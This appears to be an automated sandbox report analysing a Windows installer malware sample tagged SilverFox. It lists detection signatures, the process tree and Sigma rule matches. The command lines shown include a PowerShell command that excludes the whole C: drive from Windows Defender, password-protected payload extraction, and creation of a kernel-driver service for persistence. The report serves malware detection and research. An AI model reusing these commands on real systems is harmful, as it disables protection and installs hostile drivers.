Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_1.0.9.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
renamed because original name is a hash value
Original sample name:_1.0.9.exe
Analysis ID:1579605
MD5:ff430c30f7b9f0550f6b68dcc709c55b
SHA1:a47d3d79a05d232d45aadd14045765521cfd8431
SHA256:6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: FF430C30F7B9F0550F6B68DCC709C55B)
    • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 7008 cmdline: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 3224 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 3064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: FF430C30F7B9F0550F6B68DCC709C55B)
        • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 6220 cmdline: "C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203E2,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 6868 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 4972 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 368 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1224 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2724 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1112 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6932 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6280 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6288 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7068 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3192 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1208 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2824 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6368 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5828 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3976 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7144 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1804 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4836 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3412 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2588 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 516 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5800 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1428 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3192 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7008, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3224, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 368, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3300, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7008, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3224, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 368, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3300, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$203D4,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7008, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3224, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2167599530.0000000003410000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2167479106.0000000003210000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6CE3AEC0 FindFirstFileA,FindClose,FindClose,6_2_6CE3AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00466868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00466868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00467496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00467496
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000002.00000003.2120195815.0000000004330000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
